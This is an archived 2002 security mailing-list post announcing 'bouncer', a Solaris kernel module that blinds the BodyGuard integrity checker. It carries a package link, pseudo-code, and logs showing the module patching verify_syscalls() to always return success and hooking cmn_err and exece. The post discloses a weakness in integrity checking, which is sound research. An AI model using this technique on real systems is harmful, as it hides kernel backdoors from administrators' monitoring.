OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: noir sin (noirolympos.org)
Date: Sun Jul 07 2002 - 07:10:07 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    apoligies for replying my own mail but i must say; i have sucessfully
    developed what i was talking about below... also fix an alignment issue
    that leads to a crash in some rare cases.

    you can download the new package from:

    http://gsu.linux.org.tr/~noir/b.tar.gz

    >
    > primary_inhouse_kernel_function_used_by_bodyguard()
    > {
    > .....
    > if(kobj_getsymvalue(verify_syscalls,1)){
    > do page protection manipulation
    > patch the proper place with "return TRUE" of the verify_syscalls()
    > !! this will make verify_syscalls return TRUE meaning no problems
    > }
    > ....
    > do the realstuff ...
    > }
    >
    > this will render any kernel integrity level checker useless. solution
    > is simple integrity checkers have to be stealh to like their counterparts
    > (backdoors)

    here is how things are:
    bouncer hooks cmn_err()* and checks if verify_syscalls() resolvs, if YES
    it patches the first 2 instructions of verify_syscalls with "retl; nop;

    * cmn_err() is used for reporting to userland (through /var/adm/messages)
    so at _init() bodyguard call cmn_err() to report of its
    successful installation, nada! bouncer kicks in and patches
    verify_syscall() ...
    ;0)

    now you can even change the sysent/sysent32 table with no worries ; )
    logs of BOUNCER in action:

    bash-2.03# uname -a
    SunOS slint 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10
    bash-2.03# isainfo -b
    64
    bash-2.03# cd BOUNCER/
    bash-2.03# modload b2
    bash-2.03#
    bash-2.03# /usr/local/sbin/sshd
    bash: /usr/lib/.funky/sshd: No such file or directory
    bash-2.03# cd ../BODYGUARD
    bash-2.03# sh runbodyguard_verifier.sh
    This is the license for BodyGuard Kernel Verifier, Demo Version 1.0

    .....
    Jul 7 04:45:50 slint bodyguard: [ID 801043 kern.notice] NOTICE:
    Installing Immunity BODYGUARD module!
    Jul 7 04:45:50 slint bodyguard: [ID 300378 kern.notice] NOTICE: If there
    are any problems, please e-mail Dave Aitel at daveimmunitysec.com
    Jul 7 04:45:50 slint bodyguard: [ID 779008 kern.notice] NOTICE: This is
    just a demo version of the Immunity BODYGUARD product.
    Jul 7 04:45:50 slint bodyguard: [ID 530759 kern.notice] NOTICE: For a
    year-long site license, or limited source code license, please see
    http://www.immunitysec.com.
    Jul 7 04:45:50 slint bodyguard: [ID 222896 kern.notice] NOTICE: Done
    installing BODYGUARD.
    Jul 7 04:45:51 slint bodyguard: [ID 887483 kern.notice] NOTICE: Removing
    BODYGUARD module!
    Jul 7 05:01:22 slint bodyguard: [ID 801043 kern.notice] NOTICE:
    Installing Immunity BODYGUARD module!
    Jul 7 05:01:22 slint bodyguard: [ID 300378 kern.notice] NOTICE: If there
    are any problems, please e-mail Dave Aitel at daveimmunitysec.com
    Jul 7 05:01:22 slint bodyguard: [ID 779008 kern.notice] NOTICE: This is
    just a demo version of the Immunity BODYGUARD product.

    bash-2.03# modload bodyguard
    bash-2.03# adb -k /dev/ksyms
    physmem 3b5b
    verify_syscalls/i
    verify_syscalls:
    verify_syscalls: retl

    verify_syscalls+4: nop

    cmn_err+0x94/i
    cmn_err+0x94: call uncle_steve_albini

    exece+0xc/i
    exece+0xc: call hook_execcommon

    later,
    noir